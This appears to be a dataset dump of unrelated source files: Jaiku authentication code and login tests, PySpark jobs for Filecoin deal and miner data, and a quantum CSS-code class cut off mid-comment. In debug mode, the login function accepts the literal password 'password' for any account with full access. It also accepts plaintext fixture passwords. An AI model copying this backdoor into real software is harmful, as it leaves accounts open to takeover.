# what they are able to do on the site.
if (('oauth_token' in request.REQUEST and 'oauth_consumer_key' in request.REQUEST)
or 'HTTP_AUTHORIZATION' in request.META):
oauth_util.verify_request(request)
user = oauth_util.get_api_user(request)
return user
return None
def lookup_user_auth_token(nick, token):
return cache.get("user_auth_token/%s/%s" % (nick, token))
def generate_user_auth_token(nick, password, timeout=(14 * 24 * 60 * 60)):
token = util.hash_generic(util.generate_uuid())
cache.set("user_auth_token/%s/%s" % (nick, token), password, timeout)
return token
def authenticate_user_cookie(nick, token):
user = api.actor_get_safe(api.ROOT, nick)
if not user:
return None
# user's authenticated via cookie have full access
user.access_level = api.DELETE_ACCESS
cached_token = lookup_user_auth_token(user.nick, token)
if not cached_token:
return None
if user.password != cached_token:
return None
return user
def authenticate_user_login(nick, password):
user = api.actor_lookup_nick(api.ROOT, nick)
if not user:
return None
# user's authenticated via login have full access
user.access_level = api.DELETE_ACCESS
if settings.DEBUG and password == "password":
return user
if user.password == util.hash_password(user.nick, password):
return user
# we're changing the password hashing, this will update their password
# to their new format
# TODO(termie): The settings.MANAGE_PY stuff below is so that the tests
# will continue to work with fixtures that have the passwords
# in clear text. We should probably remove this and change
# the passwords in the fixtures to be the legacy-style
# passwords.
if (user.password == util.hash_password_intermediate(user.nick, password)
or settings.MANAGE_PY and user.password == password):
logging.debug("updating password for intermediate user: %s", user.nick)
user = api.actor_update_intermediate_password(api.ROOT,
user.nick,
password)
# a little repeat of above since we have a new user instance now
user.access_level = api.DELETE_ACCESS
return user
return None
def lookup_user_by_login(login, password):
"""Looks up user by a given login. Returns None on failure.
login - can be either nick or confirmed email
password - password associated withe the user
"""
try:
current_user = authenticate_user_login(login, password)
if current_user:
return current_user
except exception.ValidationError:
pass # let's try the email address next
# login can be confirmed email address
actor_ref = api.actor_lookup_email(api.ROOT, login)
if actor_ref:
return authenticate_user_login(actor_ref.nick, password)
return None
def set_user_cookie(response, user, remember=False):
if remember:
two_weeks = datetime.datetime.utcnow() + datetime.timedelta(days=14)
expires = two_weeks.strftime("%a %d-%b-%y %H:%M:%S GMT")
else:
expires = None
auth_token = generate_user_auth_token(user.nick, user.password)
if settings.COOKIE_DOMAIN == "localhost":
response.set_cookie(settings.USER_COOKIE,
user.nick,
expires=expires,
path=settings.COOKIE_PATH)
response.set_cookie(settings.PASSWORD_COOKIE,
auth_token,
expires=expires,
path=settings.COOKIE_PATH)
else:
response.set_cookie(settings.USER_COOKIE,
user.nick,
expires=expires,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
response.set_cookie(settings.PASSWORD_COOKIE,
auth_token,
expires=expires,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
return response
def clear_user_cookie(response):
if settings.COOKIE_DOMAIN == "localhost":
response.delete_cookie(settings.USER_COOKIE, path=settings.COOKIE_PATH)
response.delete_cookie(settings.PASSWORD_COOKIE, path=settings.COOKIE_PATH)
else:
response.delete_cookie(settings.USER_COOKIE,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
response.delete_cookie(settings.PASSWORD_COOKIE,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
return response
```
#### File: jaikuengine/explore/tests.py
```python
from django.conf import settings
from common import api
from common import normalize
from common import profile
from common import util
from common.tests import ViewTestCase
class ExploreTest(ViewTestCase):
def test_explore_when_signed_out(self):
l = profile.label('explore_get_public')
r = self.client.get('/explore')
l.stop()
self.assertContains(r, "Latest Public Posts")
self.assertTemplateUsed(r, 'explore/templates/recent.html')
def test_explore_when_signed_in(self):
self.login('popular')
l = profile.label('explore_get_logged_in')
r = self.client.get('/explore')
l.stop()
self.assertContains(r, "Latest Public Posts")
self.assertTemplateUsed(r, 'explore/templates/recent.html')
```
#### File: jaikuengine/front/views.py
```python
import logging
import random
from django.conf import settings
from django.template import RequestContext, loader
from django.http import HttpResponse, HttpResponseRedirect
from common import exception
from common import user
from common.models import Actor
from common import api, util
from common.display import prep_stream_dict, prep_entry_list
ENTRIES_PER_PAGE = 5
SIDEBAR_LIMIT = 9
SIDEBAR_FETCH_LIMIT = 50
def front_front(request):
# if the user is logged in take them to their overview
if request.user:
return HttpResponseRedirect(request.user.url() + "/overview")
# NOTE: grab a bunch of extra so that we don't ever end up with
# less than 5
per_page = ENTRIES_PER_PAGE * 2
inbox = api.inbox_get_explore(request.user, limit=per_page)
# START inbox generation chaos
# TODO(termie): refacccttttooorrrrr
entries = api.entry_get_entries(request.user, inbox)
per_page = per_page - (len(inbox) - len(entries))
entries, more = util.page_entries(request, entries, per_page)
stream_keys = [e.stream for e in entries]
streams = api.stream_get_streams(request.user, stream_keys)
actor_nicks = [e.owner for e in entries] + [e.actor for e in entries]
actors = api.actor_get_actors(request.user, actor_nicks)
# take it back down and don't show a more link
entries = entries[:ENTRIES_PER_PAGE]
more = None
# here comes lots of munging data into shape
streams = prep_stream_dict(streams, actors)
entries = prep_entry_list(entries, streams, actors)
# END inbox generation chaos
try:
# Featured Channels -- Ones to which the ROOT user is a member
featured_channels = api.actor_get_channels_member(
request.user, api.ROOT.nick, limit=SIDEBAR_FETCH_LIMIT)
random.shuffle(featured_channels)
# Just in case any are deleted:
featured_channels = featured_channels[:2*SIDEBAR_LIMIT]
featured_channels = api.channel_get_channels(
request.user, featured_channels)
featured_channels = [x for x in featured_channels.values() if x]
featured_channels = featured_channels[:SIDEBAR_LIMIT]
featured_members = api.actor_get_contacts(
request.user, api.ROOT.nick, limit=SIDEBAR_FETCH_LIMIT)
random.shuffle(featured_members)
# Just in case any are deleted:
featured_members = featured_members[:2*SIDEBAR_LIMIT]
featured_members = api.actor_get_actors(request.user, featured_members)
featured_members = [x for x in featured_members.values() if x]
featured_members = featured_members[:SIDEBAR_LIMIT]
except exception.ApiNotFound:
pass
root = api.ROOT
area = 'frontpage'
t = loader.get_template('front/templates/front.html')
c = RequestContext(request, locals())
return HttpResponse(t.render(c));
```
#### File: jaikuengine/login/tests.py
```python
from django.conf import settings
from common.tests import ViewTestCase
from common import api
from common import clean
from common import exception
from common import util
class LoginTest(ViewTestCase):
def test_login_when_signed_out(self):
r = self.login_and_get(None, '/login')
self.assertContains(r, "Forgot your password?")
self.assertContains(r, "Sign Up Now")
self.assertTemplateUsed(r, 'login/templates/login.html')
def test_login_when_signed_in(self):
r = self.login_and_get('popular', '/login')
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login_redirect_to(self):
r = self.login_and_get('popular', '/login', {'redirect_to': '/channel'})
r = self.assertRedirectsPrefix(r, '/channel')
self.assertTemplateUsed(r, 'channel/templates/index.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login(self):
log = 'popular'
pwd = self.passwords[clean.nick(log)]
r = self.client.post('/login', {'log': log, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login_with_confirmed_email(self):
log = 'hotness'
pwd = self.passwords[clean.nick(log)]
confirmed_email = '<EMAIL>'
r = self.client.post('/login', {'log': confirmed_email, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/hotness/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login_bad_password(self):
log = 'popular'
pwd = '<PASSWORD>'
r = self.client.post('/login', {'log': log, 'pwd': pwd})
self.assert_error_contains(r, 'Invalid username or password')
self.assertTemplateUsed(r, 'login/templates/login.html')
def test_login_bad_user(self):
log = 'BAD USER'
pwd = '<PASSWORD>'
r = self.client.post('/login', {'log': log, 'pwd': pwd})
self.assert_error_contains(r, 'Invalid username or password')
self.assertTemplateUsed(r, 'login/templates/login.html')
def test_login_user_cleanup(self):
log = 'broken'
pwd = self.passwords[clean.nick(log)]
actor_ref_pre = api.actor_get(api.ROOT, log)
self.assert_(not actor_ref_pre.normalized_nick)
self.assertRaises(exception.ApiException,
api.stream_get_presence,
api.ROOT,
log)
self.assertRaises(exception.ApiException,
api.stream_get_comment,
api.ROOT,
log)
r = self.client.post('/login', {'log': log, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/broken/overview')
actor_ref_post = api.actor_get(api.ROOT, log)
self.assert_(actor_ref_post.normalized_nick)
self.assert_(api.stream_get_presence(api.ROOT, log))
self.assert_(api.stream_get_comment(api.ROOT, log))
def test_login_deleted(self):
log = 'popular'
pwd = self.passwords[clean.nick(log)]
r = self.client.post('/login', {'log': log, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
api.actor_remove(api.ROOT, 'popular')
r = self.client.post('/login', {'log': log, 'pwd': <PASSWORD>})
self.assert_error_contains(r, 'Invalid username')
self.assertTemplateUsed(r, 'login/templates/login.html')
# Test cases and expected outcomes:
# 'annoying', 'girlfriend' do not have an emails associated
# 'hermit' has an unconfirmed email
class LoginForgotTest(ViewTestCase):
##### Forgot password tests:
def test_login_forgot_already_logged_in(self):
r = self.login_and_get('popular', '/login/forgot')
# User gets sent back to the home page. Unfortunately, since this is
# 'prefix', it will match a redirect anywhere. :(
r = self.assertRedirectsPrefix(r, '/', target_status_code=302)
# For this reason, test the second redirect:
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
def test_login_forgot(self):
r = self.client.get('/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
def test_login_forgot_nick_popular(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'popular',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# User enters 'popular', 'popular' has a confirmed email.
# - Send notification to that email.
def test_nick_confirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'popular',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# User enters 'hermit', 'hermit' has an unconfirmed email
# - Send notification to that email.
def test_nick_unconfirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'hermit',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# TODO(termie): stub
# User enters 'popular', 'popular' has an unconfirmed email (shared with other
# users)
# - Send notification to that email.
def test_nick_multiple_unconfirmed(self):
pass
# User enters 'annoying', 'annoying' does not have an email
# - Tough shit.
def test_nick_no_email(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'annoying',
})
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'does not have an email')
# User enters a user that doesn't exist
# - Tough shit.
def test_unknown_nick(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'idontexist',
})
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'not found')
# User enters '<EMAIL>', a confirmed email for 'popular'
# - Send notification to that email.
def test_email_confirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : '<EMAIL>',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# User enters '<EMAIL>', an unconfirmed email for 'hermit'
# - Send notification to that email
def test_email_unconfirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : '<EMAIL>',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# TODO(termie): stub
# User enters '<EMAIL>', an unconfirmed email for 'popular', 'unpopular'
# - Tough shit.
def test_email_multiple_unconfirmed(self):
pass
# User enters '<EMAIL>', which doesn't map to anything
# - Tough shit.
def test_email_notfound(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : '<EMAIL>',
})
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'does not match any accounts')
class LogoutTest(ViewTestCase):
# Once user is logged out, we should not display the "Signed in as XXX" msg.
# See issue 336 for details
def test_logout_does_not_remain_signed_in(self):
r = self.login_and_get('popular', '/login')
self.assertRedirectsPrefix(r, '/user/popular/overview')
r = self.client.get('/logout')
self.assertTemplateUsed(r, 'login/templates/logout.html')
self.assertNotContains(r, "Signed in as")
``` |
{
"source": "jimpick/miner-report-spark",
"score": 2
} |
#### File: src/deals/deals_sample.py
```python
from pyspark.sql.functions import window
from pyspark.sql.functions import expr
from pyspark.sql.functions import last
from pyspark.sql.functions import avg
from pyspark.sql.functions import min, max, sum, approx_count_distinct
def process(deals, suffix=""):
outputDir = '../work/output' + suffix
checkpointDir = '../work/checkpoint' + suffix
### Sample deals
dealsDailyByDealId = deals.groupBy(
deals.date,
window(deals.messageTime, '1 day'),
deals.dealId
).agg(
last(deals.pieceCid).alias('pieceCid'),
last(deals.pieceSize).alias('pieceSize'),
last(deals.provider).alias('provider'),
last(deals.label).alias('label'),
last(deals.startEpoch).alias('startEpoch'),
last(deals.startTime).alias('startTime'),
last(deals.endEpoch).alias('endEpoch'),
last(deals.endTime).alias('endTime')
)
querySampleDealsByPieceSize = dealsDailyByDealId \
.writeStream \
.queryName("deals_sample_by_piece_size_json") \
.format("json") \
.option("path", outputDir + "/deals/sample/by_piece_size/json") \
.option("checkpointLocation", checkpointDir + "/deals/sample/by_piece_size/json") \
.partitionBy("pieceSize", "date") \
.trigger(processingTime='1 minute') \
.start()
querySampleDealsByProviderPieceSize = dealsDailyByDealId \
.writeStream \
.queryName("deals_sample_by_provider_by_piece_size_json") \
.format("json") \
.option("path", outputDir + "/deals/sample/by_provider/by_piece_size/json") \
.option("checkpointLocation", checkpointDir + "/deals/sample/by_provider/by_piece_size/json") \
.partitionBy("provider", "pieceSize", "date") \
.trigger(processingTime='1 minute') \
.start()
querySampleDealsByLabelProvider = dealsDailyByDealId \
.writeStream \
.queryName("deals_sample_by_label_by_provider_json") \
.format("json") \
.option("path", outputDir + "/deals/sample/by_label/by_provider/json") \
.option("checkpointLocation", checkpointDir + "/deals/sample/by_label/by_provider/json") \
.partitionBy("label", "provider", "date") \
.trigger(processingTime='1 minute') \
.start()
```
#### File: src/deals/deals_source.py
```python
from pyspark.sql.functions import expr
from pyspark.sql.functions import hour
from pyspark.sql.functions import concat_ws
from pyspark.sql.types import StructType
def get(spark, suffix=""):
inputDir = 'input' + suffix
schemaDeals = StructType() \
.add("dealId", "long") \
.add("messageHeight", "long") \
.add("messageTime", "timestamp") \
.add("messageCid", "string") \
.add("pieceCid", "string") \
.add("pieceSize", "long") \
.add("verifiedDeal", "boolean") \
.add("client", "string") \
.add("provider", "string") \
.add("label", "string") \
.add("startEpoch", "long") \
.add("startTime", "timestamp") \
.add("endEpoch", "long") \
.add("endTime", "timestamp") \
.add("storagePricePerEpoch", "string") \
.add("providerCollateral", "string") \
.add("clientCollateral", "string")
deals = spark \
.readStream \
.schema(schemaDeals) \
.json(inputDir + '/deals') \
.withWatermark("messageTime", "1 minute")
deals = deals \
.withColumn("date", deals.messageTime.astype('date')) \
.withColumn("hour", hour(deals.messageTime)) \
.withColumn("clientProvider", concat_ws('-', deals.client, deals.provider)) \
.withColumn("storagePricePerEpochDouble", deals.storagePricePerEpoch.astype('double')) \
.withColumn("providerCollateralDouble", deals.providerCollateral.astype('double')) \
.withColumn("clientCollateralDouble", deals.clientCollateral.astype('double')) \
.withColumn("pieceSizeDouble", deals.pieceSize.astype('double')) \
.withColumn("lifetimeValue",
expr("storagePricePerEpochDouble * (endEpoch - startEpoch) * " +
"pieceSize / 1e18 / 1024 / 1024 / 1024"))
return deals
```
#### File: src/ips_baidu/ips_baidu.py
```python
import sys
import time
from pyspark.sql.functions import window
from pyspark.sql.functions import last
from pyspark.sql.types import StructType, ArrayType, MapType, StringType
def process(spark, suffix=""):
inputDir = 'input' + suffix
outputDir = '../work/output' + suffix
checkpointDir = '../work/checkpoint' + suffix
schemaIpsBaidu = StructType() \
.add("epoch", "long") \
.add("timestamp", "timestamp") \
.add("ip", "string") \
.add("city", "string") \
.add("long", "float") \
.add("lat", "float") \
.add("baidu", "string")
ipsBaidu = spark \
.readStream \
.schema(schemaIpsBaidu) \
.json(inputDir + '/ips-baidu') \
.withWatermark("timestamp", "1 minute")
ipsBaidu = ipsBaidu.withColumn(
"date", ipsBaidu.timestamp.astype('date'))
queryArchiveIpsBaidu = ipsBaidu \
.writeStream \
.queryName("ips_baidu_json") \
.format("json") \
.option("path", outputDir + "/ips_baidu/json") \
.option("checkpointLocation", checkpointDir + "/ips_baidu/json") \
.partitionBy("ip", "date") \
.trigger(processingTime='1 minute') \
.start()
latestIpsBaidu = ipsBaidu \
.groupBy(
'ip'
).agg(
last('epoch'),
last('timestamp'),
last('city'),
last('long'),
last('lat'),
last('baidu')
)
def output_latest_ips_baidu(df, epoch_id):
df.coalesce(1).write.json(
outputDir + '/ips_baidu/json_latest', mode='overwrite')
queryLatestIpsBaidu = latestIpsBaidu \
.writeStream \
.queryName("ips_baidu_latest_json") \
.outputMode('complete') \
.option("checkpointLocation", checkpointDir + "/ips_baidu/json_latest") \
.foreachBatch(output_latest_ips_baidu) \
.trigger(processingTime='1 minute') \
.start()
return ipsBaidu
```
#### File: src/miner_info/miner_info.py
```python
import sys
import time
from pyspark.sql.functions import window
from pyspark.sql.functions import last
from pyspark.sql.types import StructType, ArrayType, MapType, StringType
def process_miner_info(spark, suffix=""):
inputDir = 'input' + suffix
outputDir = '../work/output' + suffix
checkpointDir = '../work/checkpoint' + suffix
schemaInfo = StructType() \
.add("epoch", "long") \
.add("timestamp", "timestamp") \
.add("tipSet", "string") \
.add("miner", "string") \
.add("owner", "string") \
.add("worker", "string") \
.add("newWorker", "string") \
.add("controlAddresses", ArrayType(StringType())) \
.add("peerId", "string") \
.add("multiaddrs", ArrayType(StringType())) \
.add("multiaddrsDecoded", ArrayType(StringType())) \
.add("windowPoStProofType", "short") \
.add("sectorSize", "long") \
.add("windowPoStPartitionSectors", "long") \
.add("consensusFaultElapsed", "long") \
.add("dnsLookups", MapType(
StringType(),
ArrayType(StringType())
))
minerInfo = spark \
.readStream \
.schema(schemaInfo) \
.json(inputDir + '/miner-info') \
.withWatermark("timestamp", "1 minute")
minerInfo = minerInfo.withColumn(
"date", minerInfo.timestamp.astype('date'))
numberOfInfoRecords = minerInfo.groupBy().count()
latestMinerInfoSubset = minerInfo \
.groupBy('miner') \
.agg(
last('epoch'), \
last('timestamp'), \
last('sectorSize'), \
last('peerId'), \
last('multiaddrsDecoded'), \
last('dnsLookups') \
)
"""
queryInfoCounter = numberOfInfoRecords \
.writeStream \
.queryName("miner_info_counter") \
.outputMode('complete') \
.format('console') \
.trigger(processingTime='1 minute') \
.start()
queryMinerInfoArchive = minerInfo \
.writeStream \
.queryName("miner_info_json") \
.format("json") \
.option("path", outputDir + "/miner_info/json") \
.option("checkpointLocation", checkpointDir + "/miner_info/json") \
.partitionBy("date", "miner") \
.trigger(processingTime='1 minute') \
.start()
"""
def output_latest_miner_info_subset(df, epoch_id):
df.coalesce(1).write.json(
outputDir + '/miner_info/json_latest_subset', mode='overwrite')
queryMinerInfoSubsetLatest = latestMinerInfoSubset \
.writeStream \
.queryName("miner_info_subset_latest_json") \
.outputMode('complete') \
.option("checkpointLocation", checkpointDir + "/miner_info/json_latest_subset") \
.foreachBatch(output_latest_miner_info_subset) \
.trigger(processingTime='1 minute') \
.start()
``` |
{
"source": "jimpo/quantum-css-codes",
"score": 3
} |
#### File: jimpo/quantum-css-codes/css_code.py
```python
import itertools
import numpy as np
import pyquil.gates as gates
from pyquil.paulis import PauliTerm, ID, sX, sY, sZ
from pyquil.quil import Program
from pyquil.quilatom import MemoryReference, Qubit, QubitPlaceholder
from pyquil.quilbase import Gate
from typing import List, Union
import bin_matrix
from qecc import CodeBlock, QECC
import quil_classical
from quil_classical import MemoryChunk
from errors import InvalidCodeError, UnsupportedGateError
class CSSCode(QECC):
"""
A Calderbank-Steane-Shor (CSS) code is defined by two binary linear codes C_1, C_2 such that the
dual code of C_2 is a subspace of C_1. If C_1 is a [n, k_1, d_1] code and C_2 is a [n, k_2, d_2]
code, then the logical Hilbert space of the CSS code has dimension k_1 + k_2 - n and minimum
distance min(d_1, d_2).
The physical qubits of a CSS codeword are a classical codeword of C_1 when measured in the X
basis and a classical codeword of C_2 when measured in the Z basis. This is the opposite of the
usual nomenclature.
"""
def __init__(self, parity_check_c1, parity_check_c2):
# Validate input codes
r_1, n_1 = parity_check_c1.shape
r_2, n_2 = parity_check_c2.shape
if n_1 != n_2:
raise ValueError("C_1 and C_2 must have the same code word length")
h_1 = np.mod(np.array(parity_check_c1, dtype='int'), 2)
h_2 = np.mod(np.array(parity_check_c2, dtype='int'), 2)
if not np.array_equal(h_1, parity_check_c1):
raise ValueError("C_1 parity check matrix must be binary")
if not np.array_equal(h_2, parity_check_c2):
raise ValueError("C_2 parity check matrix must be binary")
# Check that the C_2 dual code is a subspace of C_1.
prod = np.mod(np.matmul(h_1, np.transpose(h_2)), 2)
if np.any(prod):
raise ValueError("C_2 dual code must be a subspace of C_1")
# Put H_1 and H_2 into standard form. In standard form, H_1 is represented as [I A_1 A_2]
# where I has width r_1, A_1 has width r_2, and A_2 has width n - r_1 - r_2. H_2 is
# represented as [D I E], where D has width r_1, I has width r_2, and E has width
# n - r_1 - r_2.
h_1, qubit_swaps = normalize_parity_check(h_1, offset=0)
for indices in qubit_swaps:
swap_columns(h_2, indices)
h_2, qubit_swaps = normalize_parity_check(h_2, offset=r_1)
for indices in qubit_swaps:
swap_columns(h_1, indices)
self._n = n_1
self._k = n_1 - r_1 - r_2
self.r_1 = r_1
self.r_2 = r_2
self.parity_check_c1 = h_1
self.parity_check_c2 = h_2
t_1, self._c1_syndromes = syndrome_table(h_1)
t_2, self._c2_syndromes = syndrome_table(h_2)
self._t = min(t_1, t_2)
self._transversal_gates = self._determine_transversal_gates(h_1, h_2)
if self.k != 1:
raise InvalidCodeError("currently only supports CSS codes for a single logical qubit")
@property
def n(self):
"""
Number of physical qubits per code block.
"""
return self._n
@property
def k(self):
"""
Number of logical qubits per code block.
"""
return self._k
@property
def t(self):
"""
Maximum number of errors per code block that can be corrected.
"""
return self._t
def stabilisers(self) -> List[PauliTerm]:
"""
Generate a list of generators of the stabiliser group.
"""
zeros = np.zeros(self.n, dtype='int')
x_stabilisers = (
pauli_term_for_row(self.parity_check_c1[i, :], zeros)
for i in range(self.r_1)
)
z_stabilisers = (
pauli_term_for_row(zeros, self.parity_check_c2[i, :])
for i in range(self.r_2)
)
return list(itertools.chain(x_stabilisers, z_stabilisers))
def z_operators(self) -> List[PauliTerm]:
"""
Returns the logical Z operators chosen for this CSS code as Pauli terms.
"""
z_matrix = self.z_operator_matrix()
zeros = np.zeros_like(z_matrix, dtype='int')
return [
pauli_term_for_row(zeros[i, :], z_matrix[i, :])
for i in range(self.k)
]
def z_operator_matrix(self):
"""
Returns a check matrix for the logical Z operators chosen for this CSS code.
See Nielsen & Chuang section 10.5.7 for the method of choosing operators.
"""
n, r_1, r_2, k = self.n, self.r_1, self.r_2, self.k
# Use the row vector [ A2^T 0 I ], which commutes with the check matrix.
check_mat = np.zeros((k, n), dtype='int')
check_mat[:, 0:r_1] = np.transpose(self.parity_check_c1[:, (r_1 + r_2):n])
check_mat[:, (r_1 + r_2):n] = np.identity(k)
return check_mat
def x_operators(self) -> List[PauliTerm]:
"""
Returns the logical X operators chosen for this CSS code as Pauli terms.
"""
x_matrix = self.x_operator_matrix()
zeros = np.zeros_like(x_matrix, dtype='int')
return [
pauli_term_for_row(x_matrix[i, :], zeros[i, :])
for i in range(self.k)
]
def x_operator_matrix(self):
"""
Returns a check matrix for the logical X operators chosen for this CSS code.
See Nielsen & Chuang section 10.5.7 for the method of choosing operators.
"""
n, r_1, r_2, k = self.n, self.r_1, self.r_2, self.k
# Use the row vector [ 0 E^T I | 0 0 0 ], which commutes with the check matrix.
check_mat = np.zeros((k, n), dtype='int')
check_mat[:, r_1:(r_1 + r_2)] = np.transpose(self.parity_check_c2[:, (r_1 + r_2):n])
check_mat[:, (r_1 + r_2):n] = np.identity(k)
return check_mat
def y_operators(self) -> List[PauliTerm]:
"""
Returns the logical Y operators chosen for this CSS code as Pauli terms.
"""
# Y = iXZ
y_operators = [1j * x_op * z_op
for x_op, z_op in zip(self.x_operators(), self.z_operators())]
for y_op in y_operators:
assert y_op.coefficient == 1
return y_operators
def is_transversal(self, gate_name: str) -> bool:
"""
Determines whether a quantum gates is known to be fault tolerant with transversal
application. Transversal application is when the logical gate can by implemented by
application of the physical gate to each individual qubit.
"""
return gate_name in self._transversal_gates
def _determine_transversal_gates(self, parity_check_c1, parity_check_c2):
# See "Efficient fault-tolerant quantum computing" by <NAME> for rationales.
gates = []
# I is always transversal for stabiliser codes.
gates.append('I')
# CNOT is always transversal for CSS codes. (Lemma 2, Steane 1998)
gates.append('CNOT')
# If C_1 = C_2, then H and CZ are transversal. (Lemma 3, Steane 1998)
if codes_equal(parity_check_c1, parity_check_c2):
gates.append('H')
gates.append('CZ')
# If C_1 = C_2 and is doubly even, then P transversal. (Lemma 3, Steane 1998)
if is_doubly_even(parity_check_c1):
gates.append('S')
return frozenset(gates)
def noisy_encode_zero(self, qubits: List[Union[QubitPlaceholder, int]]) -> Program:
"""
Construct a program preparing a new logical qubit in the |0> state (+1 eigenstate of \hat Z).
The qubits must all be reset to the physical |0> state at the beginning of this program. The
preparation is not fault tolerant and any physical errors that occur during preparation may
create many correlated errors in the code block.
"""
n, r_1, r_2 = self.n, self.r_1, self.r_2
# We are starting with all qubits in the |0> state, meaning they are stabilised by
# Z_1, Z_2, ..., Z_n. We want to do a unitary transformation to a state stabilised by the
# code stabilisers along with the stabilisers for the logical 0 state. In general, if a
# state |ᴪ> is stabilised by S, then U|ᴪ> is stabilised by USU†. We can perform Clifford
# gate operations to transform the stabiliser set. For details see Nielsen & Chuang
# section 10.5.2 and Problem 10.3. Also, see Appendix A of "Fault-tolerant Preparation of
# Stabilizer States for Quantum CSS Codes by ClassicalError-Correcting Codes."
#
# The idea is that we want to transform the parity check matrix from
#
# [[ 0 0 0 | I1 0 0 ], [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | 0 I2 0 ], => [ 0 0 0 | D I2 E ],
# [ 0 0 0 | 0 0 I3 ]] [ 0 0 0 | A2T 0 I3 ]]
#
# Transformations to manipulate the parity check are derived from Figure 10.7 in
# Nielsen & Chuang which shows how Pauli operators behave under conjugation by Clifford
# operators.
# The program accumulates the actual operations on the qubits.
prog = Program()
# Step 0: Copy Z's from I3 to E. Post-state:
#
# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 E ],
# [ 0 0 0 | 0 0 I3 ]]
#
# This is just a multiplication of stabilisers and does not require any instructions.
# Step 1: Apply Hadamards to move I1 to the X side. Post-state:
#
# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 E ],
# [ 0 0 0 | 0 0 I3 ]]
for i in range(r_1):
prog += gates.H(qubits[i])
# Step 2: Copy X's from I1 to A1 and A2. This has the side effect of constructing D and A2T.
# Post-state:
#
# [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | D I2 E ],
# [ 0 0 0 | A2T 0 I3 ]]
for i in range(r_1):
for j in range(r_1, n):
if self.parity_check_c1[i, j] == 1:
prog += gates.CNOT(qubits[i], qubits[j])
return prog
def noisy_encode_plus(self, qubits: List[Union[QubitPlaceholder, int]]) -> Program:
"""
Construct a program preparing a new logical qubit in the |+> state (+1 eigenstate of \hat X).
The qubits must all be reset to the physical |0> state at the beginning of this program. The
preparation is not fault tolerant and any physical errors that occur during preparation may
create many correlated errors in the code block.
"""
# See implementation of noisy_encode_zero for more detailed comments.
n, r_1, r_2 = self.n, self.r_1, self.r_2
# The idea is that we want to transform the parity check matrix from
#
# [[ 0 0 0 | I1 0 0 ], [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | 0 I2 0 ], => [ 0 0 0 | D I2 E ],
# [ 0 0 0 | 0 0 I3 ]] [ 0 ET I3 | 0 0 0 ]]
# The program accumulates the actual operations on the qubits.
prog = Program()
# Step 1: Apply Hadamards to move I1 and I3 to the X side. Post-state:
#
# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 0 ],
# [ 0 0 I3 | 0 0 0 ]]
for i in range(r_1):
prog += gates.H(qubits[i])
for i in range(r_1 + r_2, n):
prog += gates.H(qubits[i])
# Step 2: Copy Z's from I2 to E. This has the side effect of constructing ET. Post-state:
#
